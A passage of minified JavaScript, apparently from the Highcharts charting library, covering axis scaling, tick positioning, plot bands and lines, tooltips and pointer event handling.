null;a.buildStacks&&a.buildStacks();s(a.series,function(c){if(c.visible||!b.options.chart.ignoreHiddenSeries){var d;d=c.options.threshold;var e;a.hasVisibleSeries=!0;a.isLog&&0>=d&&(d=null);a.isXAxis?(d=c.xData,d.length&&(a.dataMin=J(r(a.dataMin,d[0]),va(d)),a.dataMax=x(r(a.dataMax,d[0]),la(d)))):(c.getExtremes(),e=c.dataMax,c=c.dataMin,u(c)&&u(e)&&(a.dataMin=J(r(a.dataMin,c),c),a.dataMax=x(r(a.dataMax,e),e)),u(d)&&(a.dataMin>=d?(a.dataMin=d,a.ignoreMinPadding=!0):a.dataMax<d&&(a.dataMax=d,a.ignoreMaxPadding=
!0)))}})},translate:function(a,b,c,d,e,f){var g=1,h=0,k=d?this.oldTransA:this.transA;d=d?this.oldMin:this.min;var l=this.minPixelPadding;e=(this.options.ordinal||this.isLog&&e)&&this.lin2val;k||(k=this.transA);c&&(g*=-1,h=this.len);this.reversed&&(g*=-1,h-=g*(this.sector||this.len));b?(a=a*g+h-l,a=a/k+d,e&&(a=this.lin2val(a))):(e&&(a=this.val2lin(a)),"between"===f&&(f=0.5),a=g*(a-d)*k+h+g*l+($(f)?k*f*this.pointRange:0));return a},toPixels:function(a,b){return this.translate(a,!1,!this.horiz,null,
!0)+(b?0:this.pos)},toValue:function(a,b){return this.translate(a-(b?0:this.pos),!0,!this.horiz,null,!0)},getPlotLinePath:function(a,b,c,d,e){var f=this.chart,g=this.left,h=this.top,k,l,m=c&&f.oldChartHeight||f.chartHeight,n=c&&f.oldChartWidth||f.chartWidth,q;k=this.transB;e=r(e,this.translate(a,null,null,c));a=c=z(e+k);k=l=z(m-e-k);if(isNaN(e))q=!0;else if(this.horiz){if(k=h,l=m-this.bottom,a<g||a>g+this.width)q=!0}else if(a=g,c=n-this.right,k<h||k>h+this.height)q=!0;return q&&!d?null:f.renderer.crispLine(["M",
a,k,"L",c,l],b||1)},getLinearTickPositions:function(a,b,c){var d,e=ia(F(b/a)*a),f=ia(ya(c/a)*a),g=[];if(b===c&&$(b))return[b];for(b=e;b<=f;){g.push(b);b=ia(b+a);if(b===d)break;d=b}return g},getMinorTickPositions:function(){var a=this.options,b=this.tickPositions,c=this.minorTickInterval,d=[],e;if(this.isLog)for(e=b.length,a=1;a<e;a++)d=d.concat(this.getLogTickPositions(c,b[a-1],b[a],!0));else if(this.isDatetimeAxis&&"auto"===a.minorTickInterval)d=d.concat(this.getTimeTicks(this.normalizeTimeTickInterval(c),
this.min,this.max,a.startOfWeek)),d[0]<this.min&&d.shift();else for(b=this.min+(b[0]-this.min)%c;b<=this.max;b+=c)d.push(b);return d},adjustForMinRange:function(){var a=this.options,b=this.min,c=this.max,d,e=this.dataMax-this.dataMin>=this.minRange,f,g,h,k,l;this.isXAxis&&this.minRange===v&&!this.isLog&&(u(a.min)||u(a.max)?this.minRange=null:(s(this.series,function(a){k=a.xData;for(g=l=a.xIncrement?1:k.length-1;0<g;g--)if(h=k[g]-k[g-1],f===v||h<f)f=h}),this.minRange=J(5*f,this.dataMax-this.dataMin)));
if(c-b<this.minRange){var m=this.minRange;d=(m-c+b)/2;d=[b-d,r(a.min,b-d)];e&&(d[2]=this.dataMin);b=la(d);c=[b+m,r(a.max,b+m)];e&&(c[2]=this.dataMax);c=va(c);c-b<m&&(d[0]=c-m,d[1]=r(a.min,c-m),b=la(d))}this.min=b;this.max=c},setAxisTranslation:function(a){var b=this,c=b.max-b.min,d=b.axisPointRange||0,e,f=0,g=0,h=b.linkedParent,k=!!b.categories,l=b.transA;if(b.isXAxis||k||d)h?(f=h.minPointOffset,g=h.pointRangePadding):s(b.series,function(a){var h=k?1:b.isXAxis?a.pointRange:b.axisPointRange||0,l=a.options.pointPlacement,
p=a.closestPointRange;h>c&&(h=0);d=x(d,h);f=x(f,U(l)?0:h/2);g=x(g,"on"===l?0:h);!a.noSharedTooltip&&u(p)&&(e=u(e)?J(e,p):p)}),h=b.ordinalSlope&&e?b.ordinalSlope/e:1,b.minPointOffset=f*=h,b.pointRangePadding=g*=h,b.pointRange=J(d,c),b.closestPointRange=e;a&&(b.oldTransA=l);b.translationSlope=b.transA=l=b.len/(c+g||1);b.transB=b.horiz?b.left:b.bottom;b.minPixelPadding=l*f},setTickPositions:function(a){var b=this,c=b.chart,d=b.options,e=b.isLog,f=b.isDatetimeAxis,g=b.isXAxis,h=b.isLinked,k=b.options.tickPositioner,
l=d.maxPadding,m=d.minPadding,n=d.tickInterval,q=d.minTickInterval,p=d.tickPixelInterval,w,v=b.categories;h?(b.linkedParent=c[b.coll][d.linkedTo],c=b.linkedParent.getExtremes(),b.min=r(c.min,c.dataMin),b.max=r(c.max,c.dataMax),d.type!==b.linkedParent.options.type&&fa(11,1)):(b.min=r(b.userMin,d.min,b.dataMin),b.max=r(b.userMax,d.max,b.dataMax));e&&(!a&&0>=J(b.min,r(b.dataMin,b.min))&&fa(10,1),b.min=ia(aa(b.min)),b.max=ia(aa(b.max)));b.range&&u(b.max)&&(b.userMin=b.min=x(b.min,b.max-b.range),b.userMax=
b.max,b.range=null);b.beforePadding&&b.beforePadding();b.adjustForMinRange();!(v||b.axisPointRange||b.usePercentage||h)&&u(b.min)&&u(b.max)&&(c=b.max-b.min)&&(u(d.min)||u(b.userMin)||!m||!(0>b.dataMin)&&b.ignoreMinPadding||(b.min-=c*m),u(d.max)||u(b.userMax)||!l||!(0<b.dataMax)&&b.ignoreMaxPadding||(b.max+=c*l));$(d.floor)&&(b.min=x(b.min,d.floor));$(d.ceiling)&&(b.max=J(b.max,d.ceiling));b.min===b.max||void 0===b.min||void 0===b.max?b.tickInterval=1:h&&!n&&p===b.linkedParent.options.tickPixelInterval?
b.tickInterval=b.linkedParent.tickInterval:(b.tickInterval=r(n,v?1:(b.max-b.min)*p/x(b.len,p)),!u(n)&&b.len<p&&!this.isRadial&&!this.isLog&&!v&&d.startOnTick&&d.endOnTick&&(w=!0,b.tickInterval/=4));g&&!a&&s(b.series,function(a){a.processData(b.min!==b.oldMin||b.max!==b.oldMax)});b.setAxisTranslation(!0);b.beforeSetTickPositions&&b.beforeSetTickPositions();b.postProcessTickInterval&&(b.tickInterval=b.postProcessTickInterval(b.tickInterval));b.pointRange&&(b.tickInterval=x(b.pointRange,b.tickInterval));
!n&&b.tickInterval<q&&(b.tickInterval=q);f||e||n||(b.tickInterval=eb(b.tickInterval,null,db(b.tickInterval),d));b.minorTickInterval="auto"===d.minorTickInterval&&b.tickInterval?b.tickInterval/5:d.minorTickInterval;b.tickPositions=a=d.tickPositions?[].concat(d.tickPositions):k&&k.apply(b,[b.min,b.max]);a||(!b.ordinalPositions&&(b.max-b.min)/b.tickInterval>x(2*b.len,200)&&fa(19,!0),a=f?b.getTimeTicks(b.normalizeTimeTickInterval(b.tickInterval,d.units),b.min,b.max,d.startOfWeek,b.ordinalPositions,b.closestPointRange,
!0):e?b.getLogTickPositions(b.tickInterval,b.min,b.max):b.getLinearTickPositions(b.tickInterval,b.min,b.max),w&&a.splice(1,a.length-2),b.tickPositions=a);h||(e=a[0],f=a[a.length-1],h=b.minPointOffset||0,d.startOnTick?b.min=e:b.min-h>e&&a.shift(),d.endOnTick?b.max=f:b.max+h<f&&a.pop(),1===a.length&&(d=1E13<R(b.max)?1:0.001,b.min-=d,b.max+=d))},setMaxTicks:function(){var a=this.chart,b=a.maxTicks||{},c=this.tickPositions,d=this._maxTicksKey=[this.coll,this.pos,this.len].join("-");!this.isLinked&&!this.isDatetimeAxis&&
c&&c.length>(b[d]||0)&&!1!==this.options.alignTicks&&(b[d]=c.length);a.maxTicks=b},adjustTickAmount:function(){var a=this._maxTicksKey,b=this.tickPositions,c=this.chart.maxTicks;if(c&&c[a]&&!this.isDatetimeAxis&&!this.categories&&!this.isLinked&&!1!==this.options.alignTicks&&this.min!==v){var d=this.tickAmount,e=b.length;this.tickAmount=a=c[a];if(e<a){for(;b.length<a;)b.push(ia(b[b.length-1]+this.tickInterval));this.transA*=(e-1)/(a-1);this.max=b[b.length-1]}u(d)&&a!==d&&(this.isDirty=!0)}},setScale:function(){var a=
this.stacks,b,c,d,e;this.oldMin=this.min;this.oldMax=this.max;this.oldAxisLength=this.len;this.setAxisSize();e=this.len!==this.oldAxisLength;s(this.series,function(a){if(a.isDirtyData||a.isDirty||a.xAxis.isDirty)d=!0});if(e||d||this.isLinked||this.forceRedraw||this.userMin!==this.oldUserMin||this.userMax!==this.oldUserMax){if(!this.isXAxis)for(b in a)for(c in a[b])a[b][c].total=null,a[b][c].cum=0;this.forceRedraw=!1;this.getSeriesExtremes();this.setTickPositions();this.oldUserMin=this.userMin;this.oldUserMax=
this.userMax;this.isDirty||(this.isDirty=e||this.min!==this.oldMin||this.max!==this.oldMax)}else if(!this.isXAxis)for(b in this.oldStacks&&(a=this.stacks=this.oldStacks),a)for(c in a[b])a[b][c].cum=a[b][c].total;this.setMaxTicks()},setExtremes:function(a,b,c,d,e){var f=this,g=f.chart;c=r(c,!0);e=t(e,{min:a,max:b});C(f,"setExtremes",e,function(){f.userMin=a;f.userMax=b;f.eventArgs=e;f.isDirtyExtremes=!0;c&&g.redraw(d)})},zoom:function(a,b){var c=this.dataMin,d=this.dataMax,e=this.options;this.allowZoomOutside||
(u(c)&&a<=J(c,r(e.min,c))&&(a=v),u(d)&&b>=x(d,r(e.max,d))&&(b=v));this.displayBtn=a!==v||b!==v;this.setExtremes(a,b,!1,v,{trigger:"zoom"});return!0},setAxisSize:function(){var a=this.chart,b=this.options,c=b.offsetLeft||0,d=this.horiz,e=r(b.width,a.plotWidth-c+(b.offsetRight||0)),f=r(b.height,a.plotHeight),g=r(b.top,a.plotTop),b=r(b.left,a.plotLeft+c),c=/%$/;c.test(f)&&(f=parseInt(f,10)/100*a.plotHeight);c.test(g)&&(g=parseInt(g,10)/100*a.plotHeight+a.plotTop);this.left=b;this.top=g;this.width=e;
this.height=f;this.bottom=a.chartHeight-f-g;this.right=a.chartWidth-e-b;this.len=x(d?e:f,0);this.pos=d?b:g},getExtremes:function(){var a=this.isLog;return{min:a?ia(L(this.min)):this.min,max:a?ia(L(this.max)):this.max,dataMin:this.dataMin,dataMax:this.dataMax,userMin:this.userMin,userMax:this.userMax}},getThreshold:function(a){var b=this.isLog,c=b?L(this.min):this.min,b=b?L(this.max):this.max;c>a||null===a?a=c:b<a&&(a=b);return this.translate(a,0,1,0,1)},autoLabelAlign:function(a){a=(r(a,0)-90*this.side+
720)%360;return 15<a&&165>a?"right":195<a&&345>a?"left":"center"},getOffset:function(){var a=this,b=a.chart,c=b.renderer,d=a.options,e=a.tickPositions,f=a.ticks,g=a.horiz,h=a.side,k=b.inverted?[1,0,3,2][h]:h,l,m=0,n,q=0,p=d.title,w=d.labels,t=0,P=b.axisOffset,na=b.clipOffset,K=[-1,1,1,-1][h],z,y=1,B=r(w.maxStaggerLines,5),E,H,A,D,Ia=2===h?c.fontMetrics(w.style.fontSize).b:0;a.hasData=l=a.hasVisibleSeries||u(a.min)&&u(a.max)&&!!e;a.showAxis=b=l||r(d.showEmpty,!0);a.staggerLines=a.horiz&&w.staggerLines;
a.axisGroup||(a.gridGroup=c.g("grid").attr({zIndex:d.gridZIndex||1}).add(),a.axisGroup=c.g("axis").attr({zIndex:d.zIndex||2}).add(),a.labelGroup=c.g("axis-labels").attr({zIndex:w.zIndex||7}).addClass("highcharts-"+a.coll.toLowerCase()+"-labels").add());if(l||a.isLinked){a.labelAlign=r(w.align||a.autoLabelAlign(w.rotation));s(e,function(b){f[b]?f[b].addLabel():f[b]=new xa(a,b)});if(a.horiz&&!a.staggerLines&&B&&!w.rotation){for(z=a.reversed?[].concat(e).reverse():e;y<B;){l=[];E=!1;for(w=0;w<z.length;w++)H=
z[w],A=(A=f[H].label&&f[H].label.getBBox())?A.width:0,D=w%y,A&&(H=a.translate(H),l[D]!==v&&H<l[D]&&(E=!0),l[D]=H+A);if(E)y++;else break}1<y&&(a.staggerLines=y)}s(e,function(b){if(0===h||2===h||{1:"left",3:"right"}[h]===a.labelAlign)t=x(f[b].getLabelSize(),t)});a.staggerLines&&(t*=a.staggerLines,a.labelOffset=t)}else for(z in f)f[z].destroy(),delete f[z];p&&p.text&&!1!==p.enabled&&(a.axisTitle||(a.axisTitle=c.text(p.text,0,0,p.useHTML).attr({zIndex:7,rotation:p.rotation||0,align:p.textAlign||{low:"left",
middle:"center",high:"right"}[p.align]}).addClass("highcharts-"+this.coll.toLowerCase()+"-title").css(p.style).add(a.axisGroup),a.axisTitle.isNew=!0),b&&(m=a.axisTitle.getBBox()[g?"height":"width"],q=r(p.margin,g?5:10),n=p.offset),a.axisTitle[b?"show":"hide"]());a.offset=K*r(d.offset,P[h]);a.axisTitleMargin=r(n,t+q+(t&&K*d.labels[g?"y":"x"]-Ia));P[h]=x(P[h],a.axisTitleMargin+m+K*a.offset);na[k]=x(na[k],2*F(d.lineWidth/2))},getLinePath:function(a){var b=this.chart,c=this.opposite,d=this.offset,e=this.horiz,
f=this.left+(c?this.width:0)+d,d=b.chartHeight-this.bottom-(c?this.height:0)+d;c&&(a*=-1);return b.renderer.crispLine(["M",e?this.left:f,e?d:this.top,"L",e?b.chartWidth-this.right:f,e?d:b.chartHeight-this.bottom],a)},getTitlePosition:function(){var a=this.horiz,b=this.left,c=this.top,d=this.len,e=this.options.title,f=a?b:c,g=this.opposite,h=this.offset,k=A(e.style.fontSize||12),d={low:f+(a?0:d),middle:f+d/2,high:f+(a?d:0)}[e.align],b=(a?c+this.height:b)+(a?1:-1)*(g?-1:1)*this.axisTitleMargin+(2===
this.side?k:0);return{x:a?d:b+(g?this.width:0)+h+(e.x||0),y:a?b-(g?this.height:0)+h:d+(e.y||0)}},render:function(){var a=this,b=a.horiz,c=a.reversed,d=a.chart,e=d.renderer,f=a.options,g=a.isLog,h=a.isLinked,k=a.tickPositions,l,m=a.axisTitle,n=a.ticks,q=a.minorTicks,p=a.alternateBands,w=f.stackLabels,r=f.alternateGridColor,t=a.tickmarkOffset,x=f.lineWidth,K=d.hasRendered&&u(a.oldMin)&&!isNaN(a.oldMin),z=a.hasData,y=a.showAxis,B,E=f.labels.overflow,A=a.justifyLabels=b&&!1!==E,C;a.labelEdge.length=0;
a.justifyToPlot="justify"===E;s([n,q,p],function(a){for(var b in a)a[b].isActive=!1});if(z||h)a.minorTickInterval&&!a.categories&&s(a.getMinorTickPositions(),function(b){q[b]||(q[b]=new xa(a,b,"minor"));K&&q[b].isNew&&q[b].render(null,!0);q[b].render(null,!1,1)}),k.length&&(l=k.slice(),(b&&c||!b&&!c)&&l.reverse(),A&&(l=l.slice(1).concat([l[0]])),s(l,function(b,c){A&&(c=c===l.length-1?0:c+1);if(!h||b>=a.min&&b<=a.max)n[b]||(n[b]=new xa(a,b)),K&&n[b].isNew&&n[b].render(c,!0,0.1),n[b].render(c,!1,1)}),
t&&0===a.min&&(n[-1]||(n[-1]=new xa(a,-1,null,!0)),n[-1].render(-1))),r&&s(k,function(b,c){0===c%2&&b<a.max&&(p[b]||(p[b]=new S.PlotLineOrBand(a)),B=b+t,C=k[c+1]!==v?k[c+1]+t:a.max,p[b].options={from:g?L(B):B,to:g?L(C):C,color:r},p[b].render(),p[b].isActive=!0)}),a._addedPlotLB||(s((f.plotLines||[]).concat(f.plotBands||[]),function(b){a.addPlotBandOrLine(b)}),a._addedPlotLB=!0);s([n,q,p],function(a){var b,c,e=[],f=ea?ea.duration||500:0,g=function(){for(c=e.length;c--;)a[e[c]]&&!a[e[c]].isActive&&
(a[e[c]].destroy(),delete a[e[c]])};for(b in a)a[b].isActive||(a[b].render(b,!1,0),a[b].isActive=!1,e.push(b));a!==p&&d.hasRendered&&f?f&&setTimeout(g,f):g()});x&&(b=a.getLinePath(x),a.axisLine?a.axisLine.animate({d:b}):a.axisLine=e.path(b).attr({stroke:f.lineColor,"stroke-width":x,zIndex:7}).add(a.axisGroup),a.axisLine[y?"show":"hide"]());m&&y&&(m[m.isNew?"attr":"animate"](a.getTitlePosition()),m.isNew=!1);w&&w.enabled&&a.renderStackTotals();a.isDirty=!1},redraw:function(){var a=this.chart.pointer;
a&&a.reset(!0);this.render();s(this.plotLinesAndBands,function(a){a.render()});s(this.series,function(a){a.isDirty=!0})},destroy:function(a){var b=this,c=b.stacks,d,e=b.plotLinesAndBands;a||T(b);for(d in c)Da(c[d]),c[d]=null;s([b.ticks,b.minorTicks,b.alternateBands],function(a){Da(a)});for(a=e.length;a--;)e[a].destroy();s("stackTotalGroup axisLine axisTitle axisGroup cross gridGroup labelGroup".split(" "),function(a){b[a]&&(b[a]=b[a].destroy())});this.cross&&this.cross.destroy()},drawCrosshair:function(a,
b){if(this.crosshair)if(!1===(u(b)||!r(this.crosshair.snap,!0)))this.hideCrosshair();else{var c,d=this.crosshair,e=d.animation;r(d.snap,!0)?u(b)&&(c=this.chart.inverted!=this.horiz?b.plotX:this.len-b.plotY):c=this.horiz?a.chartX-this.pos:this.len-a.chartY+this.pos;c=this.isRadial?this.getPlotLinePath(this.isXAxis?b.x:r(b.stackY,b.y)):this.getPlotLinePath(null,null,null,null,c);if(null===c)this.hideCrosshair();else if(this.cross)this.cross.attr({visibility:"visible"})[e?"animate":"attr"]({d:c},e);
else e={"stroke-width":d.width||1,stroke:d.color||"#C0C0C0",zIndex:d.zIndex||2},d.dashStyle&&(e.dashstyle=d.dashStyle),this.cross=this.chart.renderer.path(c).attr(e).add()}},hideCrosshair:function(){this.cross&&this.cross.hide()}};t(sa.prototype,{getPlotBandPath:function(a,b){var c=this.getPlotLinePath(b),d=this.getPlotLinePath(a);d&&c?d.push(c[4],c[5],c[1],c[2]):d=null;return d},addPlotBand:function(a){this.addPlotBandOrLine(a,"plotBands")},addPlotLine:function(a){this.addPlotBandOrLine(a,"plotLines")},
addPlotBandOrLine:function(a,b){var c=(new S.PlotLineOrBand(this,a)).render(),d=this.userOptions;c&&(b&&(d[b]=d[b]||[],d[b].push(a)),this.plotLinesAndBands.push(c));return c},removePlotBandOrLine:function(a){for(var b=this.plotLinesAndBands,c=this.options,d=this.userOptions,e=b.length;e--;)b[e].id===a&&b[e].destroy();s([c.plotLines||[],d.plotLines||[],c.plotBands||[],d.plotBands||[]],function(b){for(e=b.length;e--;)b[e].id===a&&oa(b,b[e])})}});sa.prototype.getTimeTicks=function(a,b,c,d){var e=[],
f={},g=I.global.useUTC,h,k=new Date(b-wa),l=a.unitRange,m=a.count;if(u(b)){l>=B.second&&(k.setMilliseconds(0),k.setSeconds(l>=B.minute?0:m*F(k.getSeconds()/m)));if(l>=B.minute)k[vb](l>=B.hour?0:m*F(k[gb]()/m));if(l>=B.hour)k[wb](l>=B.day?0:m*F(k[hb]()/m));if(l>=B.day)k[jb](l>=B.month?1:m*F(k[Ea]()/m));l>=B.month&&(k[xb](l>=B.year?0:m*F(k[Oa]()/m)),h=k[Pa]());if(l>=B.year)k[yb](h-h%m);if(l===B.week)k[jb](k[Ea]()-k[ib]()+r(d,1));b=1;wa&&(k=new Date(k.getTime()+wa));h=k[Pa]();d=k.getTime();for(var n=
k[Oa](),q=k[Ea](),p=g?wa:(864E5+6E4*k.getTimezoneOffset())%864E5;d<c;)e.push(d),d=l===B.year?Na(h+b*m,0):l===B.month?Na(h,n+b*m):g||l!==B.day&&l!==B.week?d+l*m:Na(h,n,q+b*m*(l===B.day?1:7)),b++;e.push(d);s(mb(e,function(a){return l<=B.hour&&a%B.day===p}),function(a){f[a]="day"})}e.info=t(a,{higherRanks:f,totalRange:l*m});return e};sa.prototype.normalizeTimeTickInterval=function(a,b){var c=b||[["millisecond",[1,2,5,10,20,25,50,100,200,500]],["second",[1,2,5,10,15,30]],["minute",[1,2,5,10,15,30]],["hour",
[1,2,3,4,6,8,12]],["day",[1,2]],["week",[1,2]],["month",[1,2,3,4,6]],["year",null]],d=c[c.length-1],e=B[d[0]],f=d[1],g;for(g=0;g<c.length&&!(d=c[g],e=B[d[0]],f=d[1],c[g+1]&&a<=(e*f[f.length-1]+B[c[g+1][0]])/2);g++);e===B.year&&a<5*e&&(f=[1,2,5]);c=eb(a/e,f,"year"===d[0]?x(db(a/e),1):1);return{unitRange:e,count:c,unitName:d[0]}};sa.prototype.getLogTickPositions=function(a,b,c,d){var e=this.options,f=this.len,g=[];d||(this._minorAutoInterval=null);if(0.5<=a)a=z(a),g=this.getLinearTickPositions(a,b,
c);else if(0.08<=a)for(var f=F(b),h,k,l,m,n,e=0.3<a?[1,2,4]:0.15<a?[1,2,4,6,8]:[1,2,3,4,5,6,7,8,9];f<c+1&&!n;f++)for(k=e.length,h=0;h<k&&!n;h++)l=aa(L(f)*e[h]),l>b&&(!d||m<=c)&&g.push(m),m>c&&(n=!0),m=l;else b=L(b),c=L(c),a=e[d?"minorTickInterval":"tickInterval"],a=r("auto"===a?null:a,this._minorAutoInterval,e.tickPixelInterval/(d?5:1)*(c-b)/((d?f/this.tickPositions.length:f)||1)),a=eb(a,null,db(a)),g=Xa(this.getLinearTickPositions(a,b,c),aa),d||(this._minorAutoInterval=a/5);d||(this.tickInterval=
a);return g};var Hb=S.Tooltip=function(){this.init.apply(this,arguments)};Hb.prototype={init:function(a,b){var c=b.borderWidth,d=b.style,e=A(d.padding);this.chart=a;this.options=b;this.crosshairs=[];this.now={x:0,y:0};this.isHidden=!0;this.label=a.renderer.label("",0,0,b.shape||"callout",null,null,b.useHTML,null,"tooltip").attr({padding:e,fill:b.backgroundColor,"stroke-width":c,r:b.borderRadius,zIndex:8}).css(d).css({padding:0}).add().attr({y:-9999});da||this.label.shadow(b.shadow);this.shared=b.shared},
destroy:function(){this.label&&(this.label=this.label.destroy());clearTimeout(this.hideTimer);clearTimeout(this.tooltipTimeout)},move:function(a,b,c,d){var e=this,f=e.now,g=!1!==e.options.animation&&!e.isHidden,h=e.followPointer||1<e.len;t(f,{x:g?(2*f.x+a)/3:a,y:g?(f.y+b)/2:b,anchorX:h?v:g?(2*f.anchorX+c)/3:c,anchorY:h?v:g?(f.anchorY+d)/2:d});e.label.attr(f);g&&(1<R(a-f.x)||1<R(b-f.y))&&(clearTimeout(this.tooltipTimeout),this.tooltipTimeout=setTimeout(function(){e&&e.move(a,b,c,d)},32))},hide:function(){var a=
this,b;clearTimeout(this.hideTimer);this.isHidden||(b=this.chart.hoverPoints,this.hideTimer=setTimeout(function(){a.label.fadeOut();a.isHidden=!0},r(this.options.hideDelay,500)),b&&s(b,function(a){a.setState()}),this.chart.hoverPoints=null)},getAnchor:function(a,b){var c,d=this.chart,e=d.inverted,f=d.plotTop,g=0,h=0,k;a=ha(a);c=a[0].tooltipPos;this.followPointer&&b&&(b.chartX===v&&(b=d.pointer.normalize(b)),c=[b.chartX-d.plotLeft,b.chartY-f]);c||(s(a,function(a){k=a.series.yAxis;g+=a.plotX;h+=(a.plotLow?
(a.plotLow+a.plotHigh)/2:a.plotY)+(!e&&k?k.top-f:0)}),g/=a.length,h/=a.length,c=[e?d.plotWidth-h:g,this.shared&&!e&&1<a.length&&b?b.chartY-f:e?d.plotHeight-g:h]);return Xa(c,z)},getPosition:function(a,b,c){var d=this.chart,e=this.distance,f={},g,h=["y",d.chartHeight,b,c.plotY+d.plotTop],k=["x",d.chartWidth,a,c.plotX+d.plotLeft],l=c.ttBelow||d.inverted&&!c.negative||!d.inverted&&c.negative,m=function(a,b,c,d){var g=c<d-e;b=d+e+c<b;c=d-e-c;d+=e;if(l&&b)f[a]=d;else if(!l&&g)f[a]=c;else if(g)f[a]=c;else if(b)f[a]=
d;else return!1},n=function(a,b,c,d){if(d<e||d>b-e)return!1;f[a]=d<c/2?1:d>b-c/2?b-c-2:d-c/2},q=function(a){var b=h;h=k;k=b;g=a},p=function(){!1!==m.apply(0,h)?!1!==n.apply(0,k)||g||(q(!0),p()):g?f.x=f.y=0:(q(!0),p())};(d.inverted||1<this.len)&&q();p();return f},defaultFormatter:function(a){var b=this.points||ha(this),c=b[0].series,d;d=[a.tooltipHeaderFormatter(b[0])];s(b,function(a){c=a.series;d.push(c.tooltipFormatter&&c.tooltipFormatter(a)||a.point.tooltipFormatter(c.tooltipOptions.pointFormat))});
d.push(a.options.footerFormat||"");return d.join("")},refresh:function(a,b){var c=this.chart,d=this.label,e=this.options,f,g,h={},k,l=[];k=e.formatter||this.defaultFormatter;var h=c.hoverPoints,m,n=this.shared;clearTimeout(this.hideTimer);this.followPointer=ha(a)[0].series.tooltipOptions.followPointer;g=this.getAnchor(a,b);f=g[0];g=g[1];!n||a.series&&a.series.noSharedTooltip?h=a.getLabelConfig():(c.hoverPoints=a,h&&s(h,function(a){a.setState()}),s(a,function(a){a.setState("hover");l.push(a.getLabelConfig())}),
h={x:a[0].category,y:a[0].y},h.points=l,this.len=l.length,a=a[0]);k=k.call(h,this);h=a.series;this.distance=r(h.tooltipOptions.distance,16);!1===k?this.hide():(this.isHidden&&(Ya(d),d.attr("opacity",1).show()),d.attr({text:k}),m=e.borderColor||a.color||h.color||"#606060",d.attr({stroke:m}),this.updatePosition({plotX:f,plotY:g,negative:a.negative,ttBelow:a.ttBelow}),this.isHidden=!1);C(c,"tooltipRefresh",{text:k,x:f+c.plotLeft,y:g+c.plotTop,borderColor:m})},updatePosition:function(a){var b=this.chart,
c=this.label,c=(this.options.positioner||this.getPosition).call(this,c.width,c.height,a);this.move(z(c.x),z(c.y),a.plotX+b.plotLeft,a.plotY+b.plotTop)},tooltipHeaderFormatter:function(a){var b=a.series,c=b.tooltipOptions,d=c.dateTimeLabelFormats,e=c.xDateFormat,f=b.xAxis,g=f&&"datetime"===f.options.type&&$(a.key),c=c.headerFormat,f=f&&f.closestPointRange,h;if(g&&!e){if(f)for(h in B){if(B[h]>=f||B[h]<=B.day&&0<a.key%B[h]){e=d[h];break}}else e=d.day;e=e||d.year}g&&e&&(c=c.replace("{point.key}","{point.key:"+
e+"}"));return ua(c,{point:a,series:b})}};var Ca;Ga=y.documentElement.ontouchstart!==v;var Ib=S.Pointer=function(a,b){this.init(a,b)};Ib.prototype={init:function(a,b){var c=b.chart,d=c.events,e=da?"":c.zoomType,c=a.inverted,f;this.options=b;this.chart=a;this.zoomX=f=/x/.test(e);this.zoomY=e=/y/.test(e);this.zoomHor=f&&!c||e&&c;this.zoomVert=e&&!c||f&&c;this.hasZoom=f||e;this.runChartClick=d&&!!d.click;this.pinchDown=[];this.lastValidTouch={};S.Tooltip&&b.tooltip.enabled&&(a.tooltip=new Hb(a,b.tooltip),
this.followTouchMove=b.tooltip.followTouchMove);this.setDOMEvents()},normalize:function(a,b){var c,d;a=a||window.event;a=Qb(a);a.target||(a.target=a.srcElement);d=a.touches?a.touches.length?a.touches.item(0):a.changedTouches[0]:a;b||(this.chartPosition=b=Pb(this.chart.container));d.pageX===v?(c=x(a.x,a.clientX-b.left),d=a.y):(c=d.pageX-b.left,d=d.pageY-b.top);return t(a,{chartX:z(c),chartY:z(d)})},getCoordinates:function(a){var b={xAxis:[],yAxis:[]};s(this.chart.axes,function(c){b[c.isXAxis?"xAxis":
"yAxis"].push({axis:c,value:c.toValue(a[c.horiz?"chartX":"chartY"])})});return b},getIndex:function(a){var b=this.chart;return b.inverted?b.plotHeight+b.plotTop-a.chartY:a.chartX-b.plotLeft},runPointActions:function(a){var b=this.chart,c=b.series,d=b.tooltip,e,f,g=b.hoverPoint,h=b.hoverSeries,k,l,m=b.chartWidth,n=this.getIndex(a);if(d&&this.options.tooltip.shared&&(!h||!h.noSharedTooltip)){f=[];k=c.length;for(l=0;l<k;l++)c[l].visible&&!1!==c[l].options.enableMouseTracking&&!c[l].noSharedTooltip&&
!0!==c[l].singularTooltips&&c[l].tooltipPoints.length&&(e=c[l].tooltipPoints[n])&&e.series&&(e._dist=R(n-e.clientX),m=J(m,e._dist),f.push(e));for(k=f.length;k--;)f[k]._dist>m&&f.splice(k,1);f.length&&f[0].clientX!==this.hoverX&&(d.refresh(f,a),this.hoverX=f[0].clientX)}c=h&&h.tooltipOptions.followPointer;if(h&&h.tracker&&!c){if((e=h.tooltipPoints[n])&&e!==g)e.onMouseOver(a)}else d&&c&&!d.isHidden&&(h=d.getAnchor([{}],a),d.updatePosition({plotX:h[0],plotY:h[1]}));d&&!this._onDocumentMouseMove&&(this._onDocumentMouseMove=
function(a){if(Y[Ca])Y[Ca].pointer.onDocumentMouseMove(a)},N(y,"mousemove",this._onDocumentMouseMove));s(b.axes,function(b){b.drawCrosshair(a,r(e,g))})},reset:function(a){var b=this.chart,c=b.hoverSeries,d=b.hoverPoint,e=b.tooltip,f=e&&e.shared?b.hoverPoints:d;(a=a&&e&&f)&&ha(f)[0].plotX===v&&(a=!1);if(a)e.refresh(f),d&&d.setState(d.state,!0);else{if(d)d.onMouseOut();if(c)c.onMouseOut();e&&e.hide();this._onDocumentMouseMove&&(T(y,"mousemove",this._onDocumentMouseMove),this._onDocumentMouseMove=null);
s(b.axes,function(a){a.hideCrosshair()});this.hoverX=null}},scaleGroups:function(a,b){var c=this.chart,d;s(c.series,function(e){d=a||e.getPlotBox();e.xAxis&&e.xAxis.zoomEnabled&&(e.group.attr(d),e.markerGroup&&(e.markerGroup.attr(d),e.markerGroup.clip(b?c.clipRect:null)),e.dataLabelsGroup&&e.dataLabelsGroup.attr(d))});c.clipRect.attr(b||c.clipBox)},dragStart:function(a){var b=this.chart;b.mouseIsDown=a.type;b.cancelClick=!1;b.mouseDownX=this.mouseDownX=a.chartX;b.mouseDownY=this.mouseDownY=a.chartY},
